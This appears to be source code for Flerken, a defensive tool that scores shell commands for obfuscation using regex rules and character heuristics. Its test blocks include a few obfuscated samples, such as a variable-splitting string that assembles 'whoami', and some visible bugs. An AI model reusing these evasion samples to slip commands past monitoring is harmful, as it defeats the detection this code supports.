with open(os.path.join(os.getcwd(),'flerken/config/rules/linux_rule.json')) as f:
self.rule = json.loads(f.read())['graphic']
return self.rule
except Exception:
with open(os.path.join(os.getcwd(),'../flerken/config/rules/linux_rule.json')) as f:
self.rule = json.loads(f.read())['graphic']
return self.rule
def _prepare_pattern(self, regex):
"""
Strip out key:value pairs from the pattern and compile the regular
expression.
"""
try:
return re.compile(regex)
except re.error as e:
warnings.warn(
"Caught '{error}' compiling regex: {regex}"
.format(error=e, regex=regex)
)
return re.compile(r'(?!x)x')
def _check(self):
self._load_graphic_rule()
rule_compiled = self._prepare_pattern(self.rule['regex'])
if rule_compiled.search(self.cmd) == False:
return False
else:
return True
def _underline_rate(self):
underline_cnt = (self.cmd).count("_")
total_cnt = len(self.cmd)
if total_cnt == 0:
total_cnt = 1
rate = underline_cnt/total_cnt
if rate > 0.6:
return True
else:
return False
def _detect_obfuscation(self):
check = self._check()
rate = self._underline_rate()
if check == True and rate == True:
return {"obfuscated": True, "reason": "linux.obfus.graphic"}
else:
return {"obfuscated": False, "reason": ""}
--- FILE SEPARATOR ---
#!/usr/bin/python
# -*-coding:utf-8-*-
# Path:plugins/linux_special_detect_plugin.py
__author__ = 'Yao Zhang & Zhiyang Zeng'
__copyright__ = "Copyright 2019, Apache License 2.0"
import re
import json
import os
import warnings
class linux_special_detect_plugin(object):
def __init__(self, cmd):
self.cmd = cmd
self.result = self._detect_obfuscation()
def _load_special_rules(self, type):
try:
with open(os.path.join(os.getcwd(),'flerken/config/rules/linux_rule.json')) as f:
rule = json.loads(f.read())['special'][type]
return rule
except Exception:
with open(os.path.join(os.getcwd(),'../flerken/config/rules/linux_rule.json')) as f:
rule = json.loads(f.read())['special'][type]
return rule
def _prepare_pattern(self, regex):
"""
Strip out key:value pairs from the pattern and compile the regular
expression.
"""
try:
return re.compile(regex)
except re.error as e:
warnings.warn(
"Caught '{error}' compiling regex: {regex}"
.format(error=e, regex=regex)
)
return re.compile(r'(?!x)x')
def _check_symbol_varible_name(self):
svn_rule = self._load_special_rules('symbol_varible_name')
svn_rule_compiled = self._prepare_pattern(svn_rule['regex'])
list = svn_rule_compiled.findall(self.cmd)
if len(list) >= 2:
return True
else:
return False
def _check_string_manipulation(self):
sm_rule = self._load_special_rules('string_manipulation')
sm_rule_compiled = self._prepare_pattern(sm_rule['regex'])
res = sm_rule_compiled.search(self.cmd)
if res != None:
return True
else:
return False
def _check_file_io(self):
fi_rules = self._load_special_rules('file_io')
fi_rules_compiled = dict()
for rule in fi_rules:
fi_rules_compiled[int(rule)] = self._prepare_pattern(fi_rules[rule]['regex'])
#print(fi_rules_compiled[0])
if fi_rules_compiled[0].search(self.cmd) == None:
return False
else:
variable_name = fi_rules_compiled[0].search(self.cmd).group(5)
if fi_rules_compiled[1].search(self.cmd) != None and fi_rules_compiled[2].search(self.cmd) != None:
return True
elif fi_rules_compiled[3].search(self.cmd) != None:
return True
else:
return False
def _detect_obfuscation(self):
symbol_varible_name_check = self._check_symbol_varible_name()
string_manipulation_check = self._check_string_manipulation()
file_io_check = self._check_file_io()
if symbol_varible_name_check == True or string_manipulation_check == True or file_io_check == True:
return {"obfuscated": True, "reason": "linux.obfus.special"}
else:
return {"obfuscated": False, "reason": ""}
--- FILE SEPARATOR ---
#!/usr/bin/python
# -*-coding:utf-8-*-
# Path:plugins/win_generic_detect_plugin.py
"""
This module detects obfuscation commands with the following four features:
- Readability
- Ratio of special chars
- Long strings with numbers
- Ratio of Spaces
"""
__author__ = 'Yao Zhang & Zhiyang Zeng'
__copyright__ = "Copyright 2019, Apache License 2.0"
import os
import re
import json
import warnings
from .win_generic_filter_plugin import win_generic_filter_plugin
class win_generic_detect_plugin(object):
def __init__(self, cmd):
self.cmd = cmd
self.result = self._detect_obfuscation()
def _load_generic_rules(self, type):
try:
with open(os.path.join(os.getcwd(),'flerken/config/rules/win_rule.json')) as f:
rules = json.loads(f.read())['generic'][type]
return rules
except Exception:
with open(os.path.join(os.getcwd(),'../flerken/config/rules/win_rule.json')) as f:
rules = json.loads(f.read())['generic'][type]
return rules
def _check(self):
# Calculate the ratio of special chars and spaces
ratio_special = 0
ratio_space = 0
cmd_list = list(filter(lambda x: x.isalnum(),str(self.cmd)))
cmd_new = "".join(cmd_list)
cmd_nospace = str(self.cmd).replace(" ","") # squeeze out all the spaces
# We ignore space if there are more than 10 spaces included. Also alert when there are too many spaces.
if len(self.cmd) - len(cmd_nospace) > 10: # Here consider a compensation of 10 spaces
cmd_new = cmd_new + " "
cmd_nospace = cmd_nospace + " "
ratio_space = (len(self.cmd)-len(cmd_nospace)+10)/float(len(self.cmd)) # Calculate the ratio of spaces
if len(self.cmd) != 0:
ratio_special = (len(cmd_nospace) - len(cmd_new)) / float(len(cmd_nospace))
else:
# When there are not too many spaces. We do not ignore spaces.
cmd_list = filter(lambda x: x.isalnum(), str(self.cmd).replace(" ","a"))
cmd_new = "".join(cmd_list)
if len(self.cmd) != 0:
ratio_special = (len(self.cmd) - len(cmd_new)) / float(len(self.cmd))
# Calculate the ratio of unreadable chars
ratio_unchar = 0
cmd_list = filter(lambda x: x.isalnum(),str(self.cmd))
cmd_new = "".join(cmd_list)
cmd_nospace = str(self.cmd).replace(" ","") # squeeze out all the spaces
cmd_unchar_list = filter(lambda x: x.isalnum(), str(self.cmd).replace("`","a").replace("~","a").replace("!","a").replace("@","a").replace("#","a").replace("$","a").replace("%","a").replace("^","a").replace("&","a").replace("*","a").replace("+","a").replace(",","a").replace(";","a").replace("\"","a").replace("'","a").replace("{","a").replace("}","a"))
cmd_unchar = "".join(cmd_unchar_list)
if len(self.cmd) - len(cmd_nospace) > 10: # Here consider a compensation of 10 spaces
cmd_nospace = cmd_nospace + " "
if (len(cmd_nospace)-len(cmd_new)) != 0:
ratio_unchar = (len(cmd_unchar) - len(cmd_new)) / float(len(cmd_nospace)-len(cmd_new))
else:
if (len(self.cmd)-len(cmd_new)) != 0:
ratio_unchar = (len(cmd_unchar)-len(cmd_new)) / float(len(self.cmd)-len(cmd_new))
# Calculate the number of words that are composed of alphabets
pattern = re.compile(r'[a-zA-Z]+')
result = pattern.findall(self.cmd)
ctr_total = len(result)
if ctr_total == 0:
ctr_total = 1 # Avoid ctr divide by 0 in the following code
ctr = 0
# Define a limited whitelist that are considered as readable words
whitelist = [] # add this list on demand
for word in result:
if len(word) > 10: # (1) Long word case
ctr += 1
else:
pattern_vowels = re.compile(r'[a|A|e|E|i|I|o|O|u|U]')
result_vowels = pattern_vowels.findall(word)
#print result_vowels
ratio = len(result_vowels)/float(len(word))
#print ratio
if ratio > 0.8 or ratio < 0.4: # (2) Define a suitable vowel letter ratio interval
if word.lower() not in whitelist:
ctr += 1
else:
pattern_repeat = re.compile(r'(.)\1{4}')
# (3) Repetition case. Find out the repeat of an alphabet for more than n times
result_repeat = pattern_repeat.findall(word)
if len(result_repeat) >= 1:
ctr += 1
else:
#(4) Uncommon capital case.
pattern_case = re.compile(r'[A-Z]')
pattern_first = re.compile(r'[a-z]')
result_case = pattern_case.findall(word)
case_ratio = len(result_case)/float(len(word))
if case_ratio >= 0.6 and case_ratio != 1:
ctr += 1
#print word
#print case_ratio
elif case_ratio > 0 and re.match(pattern_first,word):
ctr += 1
ratio_unread = ctr / float(ctr_total); #Calc the ratio of unreadable words.
long_cmd_rules = self._load_generic_rules('long_cmd')
shorter_cmd_rules = self._load_generic_rules('shorter_cmd')
shortest_cmd_rules = self._load_generic_rules('shortest_cmd')
if len(self.cmd) > long_cmd_rules['length']: # long cmd case
if ratio_space > long_cmd_rules['condition']["0"]["ratio_space"]:
return True
elif ratio_special > long_cmd_rules['condition']["1"]["ratio_special"] and ratio_unread > long_cmd_rules['condition']["1"]["ratio_unread"]:
return True
elif ratio_unchar > long_cmd_rules['condition']["2"]["ratio_unchar"] and ratio_unread > long_cmd_rules['condition']["2"]["ratio_unread"]:
return True
elif ratio_unchar > long_cmd_rules['condition']["3"]["ratio_unchar"] and ratio_unread > long_cmd_rules['condition']["3"]["ratio_unread"]:
return True
elif ratio_special > long_cmd_rules['condition']["4"]["ratio_special"] and ratio_unread > long_cmd_rules['condition']["4"]["ratio_unread"]:
return True
elif len(self.cmd) > long_cmd_rules['condition']["5"]["length"]:
return True
else:
ws = long_cmd_rules['ws'] # The weight of special chars
wc = long_cmd_rules['wc'] # The weight of unreadable chars
wu = long_cmd_rules['wu'] # The weight of unreadable words
score = ratio_special * ws + ratio_unchar * wc + ratio_unread * wu #+ ratio_str * wl #Calc the final score.
if score > 0.2:
return True
else:
return False
elif len(self.cmd) >= shorter_cmd_rules['length']: # shorter cmd case
if ratio_special > shorter_cmd_rules['condition']["0"]["ratio_special"] and ratio_unread > shorter_cmd_rules['condition']["0"]["ratio_unread"]:
return True
elif ratio_unchar > shorter_cmd_rules['condition']["1"]["ratio_unchar"] and ratio_unread > shorter_cmd_rules['condition']["1"]["ratio_unread"]:
return True
elif ratio_unchar > shorter_cmd_rules['condition']["2"]["ratio_unchar"] and ratio_unread > shorter_cmd_rules['condition']["2"]["ratio_unread"]:
return True
elif ratio_special > shorter_cmd_rules['condition']["3"]["ratio_special"] and ratio_unread > shorter_cmd_rules['condition']["3"]["ratio_unread"]:
return True
else:
w_s = shorter_cmd_rules['ws'] # The weight of special chars
w_c = shorter_cmd_rules['wc'] # The weight of unreadable chars
w_u = shorter_cmd_rules['wu'] # The weight of unreadable words
score = ratio_special * w_s + ratio_unchar * w_c + ratio_unread * w_u #+ ratio_str * w_l #Calc the final score.
if score > 0.2:
return True
else:
return False
elif len(self.cmd) > shortest_cmd_rules['length']: # shortest cmd case
if ratio_special > shortest_cmd_rules["condition"]["0"]["ratio_special"] and ratio_unread > shortest_cmd_rules["condition"]["0"]["ratio_unread"]:
return True
elif ratio_unchar > shortest_cmd_rules["condition"]["1"]["ratio_unchar"] and ratio_unread > shortest_cmd_rules["condition"]["1"]["ratio_unread"]:
return True
elif ratio_unchar > shortest_cmd_rules["condition"]["2"]["ratio_unchar"] and ratio_unread > shortest_cmd_rules["condition"]["2"]["ratio_unread"]:
return True
elif ratio_special > shortest_cmd_rules["condition"]["3"]["ratio_special"] and ratio_unread > shortest_cmd_rules["condition"]["3"]["ratio_unread"]:
return True
else:
w_ss = shortest_cmd_rules["ws"] # The weight of special chars
w_cc = shortest_cmd_rules['wc'] # The weight of unreadable chars
w_uu = shortest_cmd_rules['wu'] # The weight of unreadable words
score = ratio_special * w_ss + ratio_unchar * w_cc + ratio_unread * w_uu #Calc the final score.
if score > 0.2:
return True
else:
return False
else:
return False
def _detect_obfuscation(self):
if win_generic_filter_plugin(self.cmd).result == False:
check = self._check()
if check == True:
return {"obfuscated": True, "reason": "windows.obfus.generic"}
else:
return {"obfuscated": False, "reason": ""}
else:
return {"obfuscated": False, "reason": ""}
if __name__ == '__main__':
sample = ''
print('sample command:\n'+sample+'\n')
a = win_generic_detect_plugin(cmd)
a._detect_obfuscation()
--- FILE SEPARATOR ---
#!/usr/bin/python
# -*-coding:utf-8-*-
# Path:plugins/win_special_detect_plugin.py
"""
This module detects windows special obfuscation commands
"""
__author__ = 'Yao Zhang & Zhiyang Zeng'
__copyright__ = "Copyright 2019, Apache License 2.0"
import sys, os
import json
import socket
import traceback
from math import log
import time
import re
import string
from .win_special_filter_plugin import win_special_filter_plugin
class win_special_detect_plugin():
def __init__(self, cmd):
self.cmd = cmd
self.result = self._detect_obfuscation()
def _load_special_rules(self):
try:
with open(os.path.join(os.getcwd(),'flerken/config/rules/win_rule.json')) as f:
rules = json.loads(f.read())['special']
return rules
except Exception:
with open(os.path.join(os.getcwd(),'../flerken/config/rules/win_rule.json')) as f:
rules = json.loads(f.read())['special']
return rules
def _check(self):
# Calculate the long strings with numbers
pattern_str = re.compile(r'[a-zA-Z0-9]+[a-zA-Z0-9|\+|\/]*[\=]*')
result_str = pattern_str.findall(self.cmd)
cmd1="This is a good apple"
for string in result_str:
if len(string) >= len(cmd1):
cmd1 = string
self.cmd = cmd1
# Calculate the number of words that are composed of alphabets
pattern = re.compile(r'[a-zA-Z]+')
result = pattern.findall(self.cmd)
ctr_total = len(result)
if ctr_total == 0:
ctr_total = 1 # Avoid ctr divide by 0 in the following code
ctr = 0
# Define a limited whitelist that are considered as readable words
whitelist = []
for word in result:
if len(word) > 2019: # (1) Long word case
ctr += 1
else:
pattern_vowels = re.compile(r'[a|A|e|E|i|I|o|O|u|U]')
result_vowels = pattern_vowels.findall(word)
#print result_vowels
ratio = len(result_vowels)/float(len(word))
#print ratio
if ratio > 0.87 or ratio < 0.42: # (2) Vowel case
if word.lower() not in whitelist:
ctr += 1
else:
pattern_repeat = re.compile(r'(.)\1{4}')
# (3) Repetition case. Find out the repeat of an alphabet for more than n times
result_repeat = pattern_repeat.findall(word)
if len(result_repeat) >= 1:
ctr += 1
else:
#(4) Uncommon capital case.
pattern_case = re.compile(r'[A-Z]')
pattern_first = re.compile(r'[a-z]')
result_case = pattern_case.findall(word)
case_ratio = len(result_case)/float(len(word))
if case_ratio >= 0.66 and case_ratio != 1:
ctr += 1
elif case_ratio > 0 and re.match(pattern_first,word):
ctr += 1
ratio_unread = ctr / float(ctr_total); #Calc the ratio of unreadable words.
special_rules = self._load_special_rules()
if len(self.cmd) > special_rules['length']:
if ratio_unread > special_rules['condition']["0"]["ratio_unread"]:
return True
else:
return False
else:
return False
def _detect_obfuscation(self):
if win_special_filter_plugin(self.cmd).result == False:
check = self._check()
if check == True:
return {"obfuscated": True, "reason": "windows.obfus.special"}
else:
return {"obfuscated": False, "reason": ""}
else:
return {"obfuscated": False, "reason": ""}
if __name__ == '__main__':
#test
sample = 'CMD.exe HU5IGBNJM4GUGSHLHSDDS6DESQ87WE4QKLJSQIUHKNJ98HKLHJKS=='
print('sample command:\n'+sample+'\n')
a = win_special_detect_plugin(sample)._detect_obfuscation()
print(a)
--- FILE SEPARATOR ---
#!/usr/bin/python
# -*-coding:utf-8-*-
# Path:plugins/win_special_filter_plugin.py
"""
This module filters windows special obfuscation commands
"""
__author__ = 'Yao Zhang & Zhiyang Zeng'
__copyright__ = "Copyright 2019, Apache License 2.0"
import re
import json
import os
class win_special_filter_plugin(object):
def __init__(self,cmd):
self.cmd = cmd
self.result = self._check()
def _load_special_whitelists(self, type):
try:
with open(os.path.join(os.getcwd(),'flerken/config/whitelists/win_whitelist.json')) as f:
whitelists = json.loads(f.read())['special'][type]
return whitelists
except Exception:
with open(os.path.join(os.getcwd(),'../flerken/config/whitelists/win_whitelist.json')) as f:
rules = json.loads(f.read())['special'][type]
return rules
def _prepare_pattern(self, regex):
"""
Strip out key:value pairs from the pattern and compile the regular
expression.
"""
try:
return re.compile(regex, re.I)
except re.error as e:
warnings.warn(
"Caught '{error}' compiling regex: {regex}"
.format(error=e, regex=regex)
)
return re.compile(r'(?!x)x')
def _unit_check(self,type):
self.whitelists = self._load_special_whitelists(type)
for wl in range(0,len(self.whitelists)):
regex_compiled = self._prepare_pattern(self.whitelists[str(wl)]['regex'])
if 'length' in self.whitelists[str(wl)].keys():
if self.whitelists[str(wl)]['condition'] == '<':
if regex_compiled.search(self.cmd) != None and len(self.cmd) < self.whitelists[str(wl)]['length']:
return True
break
else:
continue
if self.whitelists[str(wl)]['condition'] == '>':
if regex_compiled.search(self.cmd) != None and len(self.cmd) > self.whitelists[str(wl)]['length']:
return True
break
else:
continue
if self.whitelists[str(wl)]['condition'] == '<=':
if regex_compiled.search(self.cmd) != None and len(self.cmd) <= self.whitelists[str(wl)]['length']:
return True
break
else:
continue
if self.whitelists[str(wl)]['condition'] == '>=':
if regex_compiled.search(self.cmd) != None and len(self.cmd) >= self.whitelists[str(wl)]['length']:
return True
break
else:
continue
if self.whitelists[str(wl)]['condition'] == '=':
if regex_compiled.search(self.cmd) != None and len(self.cmd) == self.whitelists[str(wl)]['length']:
return True
break
else:
continue
else:
if regex_compiled.search(self.cmd) != None:
return True
break
else:
continue
return False
def _comm_cmd_check(self):
regex_dict = self._load_special_whitelists('comm_cmd')
regex_compile = dict()
for key in regex_dict:
regex_compile[int(key)] = self._prepare_pattern(regex_dict[key]['regex'])
#filter logic start
if regex_compile[0].search(self.cmd) != None and regex_compile[-1].search(self.cmd) == None:
return True
elif regex_compile[1].search(self.cmd) != None and regex_compile[-1].search(self.cmd) == None:
return True
elif regex_compile[2].search(self.cmd) != None and regex_compile[-1].search(self.cmd) == None:
return True
return False
def _check(self):
flag = 0
type_list=['normal_win_process', 'popular_software']
for type in type_list:
check = self._unit_check(type)
if check == True:
flag = -1
break
else:
continue
if flag == -1:
return False
else:
comm_cmd_res = self._comm_cmd_check()
if comm_cmd_res == False:
return False
else:
return True
if __name__ == '__main__':
#test
sample = 'winAgentSC.exe >'
print('input cmd: '+sample)
a = win_special_filter_plugin(sample)
out = a._check()
print('out: '+str(out))
--- FILE SEPARATOR ---
#!/usr/bin/python
# -*-coding:utf-8-*-
"""
Flerken smart detect logic
"""
__author__ = 'Yao Zhang & Zhiyang Zeng'
__copyright__ = "Copyright 2019, Apache License 2.0"
import sys
import os
import hashlib
import time
from datetime import datetime
import re
from flerken import app
try:
from .plugins.linux_generic_detect_plugin import linux_generic_detect_plugin
except Exception:
from plugins.linux_generic_detect_plugin import linux_generic_detect_plugin
try:
from .plugins.win_special_detect_plugin import win_special_detect_plugin
except Exception:
from plugins.win_special_detect_plugin import win_special_detect_plugin
try:
from .plugins.win_generic_detect_plugin import win_generic_detect_plugin
except Exception:
from plugins.win_generic_detect_plugin import win_generic_detect_plugin
try:
from .plugins.custom_meta_chars_plugin import custom_meta_chars_plugin
except Exception:
from plugins.custom_meta_chars_plugin import custom_meta_chars_plugin
try:
from .plugins.linux_special_detect_plugin import linux_special_detect_plugin
except Exception:
from plugins.linux_special_detect_plugin import linux_special_detect_plugin
try:
from .plugins.linux_graphic_detect_plugin import linux_graphic_detect_plugin
except Exception:
from plugins.linux_graphic_detect_plugin import linux_graphic_detect_plugin
class smart_detect(object):
def __init__(self,cmd):
app.logger.info('='*50)
app.logger.info('[+]time: '+datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
self.original_cmd = cmd
app.logger.info('[+]original cmd: '+self.original_cmd)
self.cmd = custom_meta_chars_plugin(cmd).result
app.logger.info('[+]meta cmd: '+self.cmd)
self.start_time = time.time()
def _prepare_pattern(self, regex):
"""
Strip out key:value pairs from the pattern and compile the regular
expression.
"""
try:
return re.compile(regex, re.I)
except re.error as e:
warnings.warn(
"Caught '{error}' compiling regex: {regex}"
.format(error=e, regex=regex)
)
return re.compile(r'(?!x)x')
def _hash_calc(self):
sha256 = hashlib.sha256()
sha256.update((self.cmd).encode('UTF8'))
return sha256.hexdigest()
def linux_identify(self):
linux_identification_generic = linux_generic_detect_plugin(self.cmd).result
linux_identification_graphic = linux_graphic_detect_plugin(self.cmd).result
linux_identification_special = linux_special_detect_plugin(self.cmd).result
app.logger.info('[+]linux_identification_generic: '+str(linux_identification_generic))
app.logger.info('[+]linux_identification_graphic: '+str(linux_identification_graphic))
app.logger.info('[+]linux_identification_special: '+str(linux_identification_special))
if linux_identification_graphic['obfuscated'] == True:
self.end_time = time.time()
linux_identification_graphic['measure_time'] = str(round(self.end_time - self.start_time,5)) + 's'
linux_identification_graphic['hash'] = 'sha256: ' + self._hash_calc()
linux_identification_graphic['platform'] = 'linux'
linux_identification_graphic['cmd'] = self.original_cmd
linux_identification_graphic['res'] = 0
return linux_identification_graphic
elif linux_identification_graphic['obfuscated'] == False and linux_identification_special['obfuscated'] == True:
self.end_time = time.time()
linux_identification_special['measure_time'] = str(round(self.end_time - self.start_time,5)) + 's'
linux_identification_special['hash'] = 'sha256: ' + self._hash_calc()
linux_identification_special['platform'] = 'linux'
linux_identification_special['cmd'] = self.original_cmd
linux_identification_special['res'] = 0
return linux_identification_special
else:
self.end_time = time.time()
linux_identification_generic['measure_time'] = str(round(self.end_time - self.start_time,5)) + 's'
linux_identification_generic['hash'] = 'sha256: ' + self._hash_calc()
linux_identification_generic['platform'] = 'linux'
linux_identification_generic['cmd'] = self.original_cmd
linux_identification_generic['res'] = 0
return linux_identification_generic
def win_identify(self):
if len(self.cmd) <= 20:
app.logger.info('[+]win_identify cmd length < 20')
win_identification = dict()
win_identification['res'] = 0
win_identification['obfuscated'] = False
win_identification['reason'] =''
self.end_time = time.time()
win_identification['measure_time'] = str(round(self.end_time - self.start_time,5)) + 's'
win_identification['hash'] = 'sha256: ' + self._hash_calc()
win_identification['platform'] = 'windows'
win_identification['cmd'] = self.original_cmd
return win_identification
special_res = win_special_detect_plugin(self.cmd).result
generic_res = win_generic_detect_plugin(self.cmd).result
app.logger.info('[+]win_special_res: '+str(special_res))
app.logger.info('[+]win_generic_res: '+str(generic_res))
if generic_res['obfuscated'] == True:
win_identification = dict()
win_identification['res'] = 0
if len(self.cmd) >= 50:
win_identification['obfuscated'] = generic_res['obfuscated']
win_identification['reason'] = generic_res['reason']
else:
win_identification['obfuscated'] = 'suspicious'
win_identification['reason'] = 'windows.suspicious.generic'
self.end_time = time.time()
win_identification['measure_time'] = str(round(self.end_time - self.start_time,5)) + 's'
win_identification['hash'] = 'sha256: ' + self._hash_calc()
win_identification['platform'] = 'windows'
win_identification['cmd'] = self.original_cmd
return win_identification
elif generic_res['obfuscated'] == False and special_res['obfuscated'] == True:
win_identification = dict()
win_identification['res'] = 0
win_identification['obfuscated'] = special_res['obfuscated']
win_identification['reason'] = special_res['reason']
self.end_time = time.time()
win_identification['measure_time'] = str(round(self.end_time - self.start_time,5)) + 's'
win_identification['hash'] = 'sha256: ' + self._hash_calc()
win_identification['platform'] = 'windows'
win_identification['cmd'] = self.original_cmd
return win_identification
else:
win_identification = dict()
win_identification['res'] = 0
win_identification['obfuscated'] = False
win_identification['reason'] = ''
self.end_time = time.time()
win_identification['measure_time'] = str(round(self.end_time - self.start_time,5)) + 's'
win_identification['hash'] = 'sha256: ' + self._hash_calc()
win_identification['platform'] = 'windows'
win_identification['cmd'] = self.original_cmd
return win_identification
def not_sure_identify(self):
linux_identify_res = self.linux_identify()
if linux_identify_res['obfuscated'] == True:
linux_identify_res['likely_platform'] = 'linux'
linux_identify_res.pop('platform')
return linux_identify_res
else:
win_identify_res = self.win_identify()
if win_identify_res['obfuscated'] == True or win_identify_res['obfuscated'] == 'suspicious':
win_identify_res['likely_platform'] = 'windows'
win_identify_res.pop('platform')
return win_identify_res
else:
not_sure_res = linux_identify_res
not_sure_res['likely_platform'] = ''
return not_sure_res
if __name__ == '__main__':
#test
sample = 'ki=w;das=ho;qq=ami;$ki$das$qq'
print('input cmd: '+sample)
a = smart_detect(sample)
out = a.linux_identify()
--- FILE SEPARATOR ---
#!/usr/bin/python
# -*-coding:utf-8-*-
"""
Flerken detection page control center
"""
__author__ = 'Yao Zhang & Zhiyang Zeng'
__copyright__ = "Copyright 2019, Apache License 2.0"
from flask import render_template, request, redirect, url_for
from flerken import app
import html
import json
from .control.smart_detect import smart_detect
from .lib.mysql_conn import *
from datetime import datetime
@app.route('/detection', methods = ['GET'])
def detection_index():
return render_template("detection.html")
@app.route('/v1/detect/result.json', methods = ['POST'])
def detect_api():
cmd = request.form['cmd'] if ('cmd' in request.form.keys()) else ''
platform = request.form['platform'] if ('platform' in request.form.keys()) else 'not_sure'
#delete spaces and fix unicode
cmd = html.unescape(cmd).lstrip().rstrip()
cmd = cmd.replace(u'\xa0', u' ')
#print(cmd)
#cmd is null or space
if len(cmd) == 0:
result = {'res': -1, 'message': 'Length of your input command is zero, please check it and try again!'}
return json.dumps(result)
else:
if platform == 'linux':
res = smart_detect(cmd).linux_identify()
db_info = {}
db_info['rid'] = 0
db_info['cmd'] = res['cmd']
db_info['hash'] = res['hash']
db_info['obfuscated'] = str(res['obfuscated'])
db_info['likely_platform'] = res['platform']
db_info['selected_platform'] = 'linux'
db_info['reason'] = res['reason']
db_info['measure_time'] = res['measure_time']
try:
db_info['submit_ip'] = request.headers['X-Real-IP']
except Exception:
db_info['submit_ip'] = request.remote_addr
db_info['submit_time'] = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
Results = M('results')
Results.add(db_info)
return json.dumps(res)
elif platform == 'windows':
res = smart_detect(cmd).win_identify()
db_info = {}
db_info['rid'] = 0
db_info['cmd'] = res['cmd']
db_info['hash'] = res['hash']
db_info['obfuscated'] = str(res['obfuscated'])
db_info['likely_platform'] = res['platform']
db_info['selected_platform'] = 'windows'
db_info['reason'] = res['reason']
db_info['measure_time'] = res['measure_time']
try:
db_info['submit_ip'] = request.headers['X-Real-IP']
except Exception:
db_info['submit_ip'] = request.remote_addr
db_info['submit_time'] = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
Results = M('results')
Results.add(db_info)
return json.dumps(res)
elif platform == 'not_sure':
res = smart_detect(cmd).not_sure_identify()
db_info = {}
db_info['rid'] = 0
db_info['cmd'] = res['cmd']
db_info['hash'] = res['hash']
db_info['obfuscated'] = str(res['obfuscated'])
db_info['likely_platform'] = res['likely_platform']
db_info['selected_platform'] = 'not_sure'
db_info['reason'] = res['reason']
db_info['measure_time'] = res['measure_time']
try:
db_info['submit_ip'] = request.headers['X-Real-IP']
except Exception:
db_info['submit_ip'] = request.remote_addr
db_info['submit_time'] = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
Results = M('results')
Results.add(db_info)
return json.dumps(res)
else:
result = {'res': -1, 'message': 'PLatform should be choosed in following list ["linux", "windowd", "not_sure"]'}
return json.dumps(result)
--- FILE SEPARATOR ---
#!/usr/bin/python
# -*-coding:utf-8-*-
"""
Flerken landing page control center
"""
__author__ = 'Yao Zhang & Zhiyang Zeng'
__copyright__ = "Copyright 2019, Apache License 2.0"
from flask import render_template, request, redirect, url_for, make_response, send_from_directory
from flerken import app
import os
@app.route('/', methods = ['GET'])
@app.route('/landing', methods = ['GET'])
def landing():
return render_template("landing.html")
@app.route('/doc/<filename>', methods = ['GET'])
def doc(filename):
file_path = os.getcwd()+'/doc'
response = make_response(send_from_directory(file_path,filename.encode('utf-8').decode('utf-8')))
response.headers["Content-Type"] = "application/pdf"
return response
--- FILE SEPARATOR ---
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# https://github.com/frankie-huang/pythonMySQL
import sys,os
sys.path.append(os.getcwd()+'/flerken/config')
from global_config import DB_CONFIG
import mysql.connector
import traceback
import re
import datetime
class pythonMySQL(object):
configs = {}
current = 0
config = {}
con = None
cur = None
dbdebug = False
database = ''
table_name = ''
columns = []
connected = False
queryStr = ''
SQLerror = {}
lastInsertId = 0
numRows = 0
tmp_table = ''
aliasString = ''
fieldString = ''
joinString = ''
whereString = ''
groupString = ''
havingString = ''
orderString = ''
limitString = ''
fetchSql = False
whereStringArray = []
whereValueArray = []
SQL_logic = ['AND', 'OR', 'XOR']
def __init__(self, dbtable, ConfigID=0, dbConfig=None):
if not isinstance(ConfigID, (int, str)):
self.throw_exception("ConfigID need to be input as str or int", True)
self.columns = []
self.whereStringArray = []
self.whereValueArray = []
self.SQLerror = {}
if ConfigID in pythonMySQL.configs:
self.init(ConfigID, dbtable)
return
if dbConfig == None:
if not isset('DB_CONFIG'):
self.throw_exception("undefined DB_CONFIG", True)
if ConfigID not in DB_CONFIG:
self.throw_exception(
"There is no " + (str(ConfigID) if isinstance(ConfigID, int) else "'" + ConfigID + "'") + "in config", True)
if ConfigID == 0:
dbConfig = DB_CONFIG[0]
else:
dbConfig = dict(DB_CONFIG[0])
dbConfig.update(DB_CONFIG[ConfigID])
if 'DB_DEBUG' in dbConfig:
if dbConfig['DB_DEBUG'] == True:
self.dbdebug = True
del dbConfig['DB_DEBUG']
if 'password' not in dbConfig:
if 'password' in DB_CONFIG[0]:
dbConfig['password'] = DB_CONFIG[0]['password']
else:
self.throw_exception('password not be setted')
if 'host' not in dbConfig:
dbConfig['host'] = '127.0.0.1'
if 'user' not in dbConfig:
dbConfig['user'] = 'root'
if 'port' not in dbConfig:
dbConfig['port'] = '3306'
if 'autocommit' not in dbConfig:
dbConfig['autocommit'] = True
pythonMySQL.configs[ConfigID] = dbConfig
self.current = ConfigID
self.config = dbConfig
self.database = dbConfig['database']
self.init(self.current, dbtable)
def init(self, current, dbtable):
self.current = current
self.config = pythonMySQL.configs[current]
self.con = mysql.connector.connect(**self.config)
self.cur = self.con.cursor(dictionary=True)
if 'DB_DEBUG' in self.config and self.config['DB_DEBUG'] == True:
self.dbdebug = True
self.database = self.config['database']
if self.in_db(dbtable):
self.table_name = dbtable
else:
self.throw_exception('table ' + dbtable + 'not exists in ' + self.config['database'])
self.connected = True
def in_db(self, dbtable):
self.cur.execute('show tables')
tables = self.cur.fetchall()
key = 'Tables_in_' + self.database
for table in tables:
if dbtable == table[key]:
return True
return False
def set_columns(self, dbtable):
self.cur.execute("SHOW COLUMNS FROM `" + dbtable + "`")
columns = self.cur.fetchall()
self.columns = ['', ]
for column in columns:
if column['Key'] == 'PRI':
self.columns[0] = column['Field']
self.columns.append(column['Field'])
def get_columns(self):
return self.cur.column_names
# where("id = 1 and nick = 'frankie'")
# where("id = %d and nick = '%s'", 1, 'frankie')
# where("id = %d and nick = '%s'", (1, 'frankie'))
# where("id = %d and nick = '%s'", [1, 'frankie'])
######
# where({'id':1, 'nick':'frankie'})
# where({'id&nick':"1"}) # WHERE `id`='1' AND `nick`='1'
# where({'id&nick':[1, 'frankie']}) = where({'id&nick':[1, 'frankie', '', 's']})
# where({'id':[1, 2, 3, 'or', 'm']}) # WHERE `id`=1 OR `id`=2 OR `id`=3
# where({'id&nick':[1, 'frankie', 'or', 'm']}) # WHERE (`id`=1 OR `id`='frankie') AND (`nick`=1 OR `nick`='frankie')
def where(self, *where):
param_number = len(where)
if isinstance(where[0], str):
if param_number == 1:
whereSubString = '( ' + where[0] + ' )'
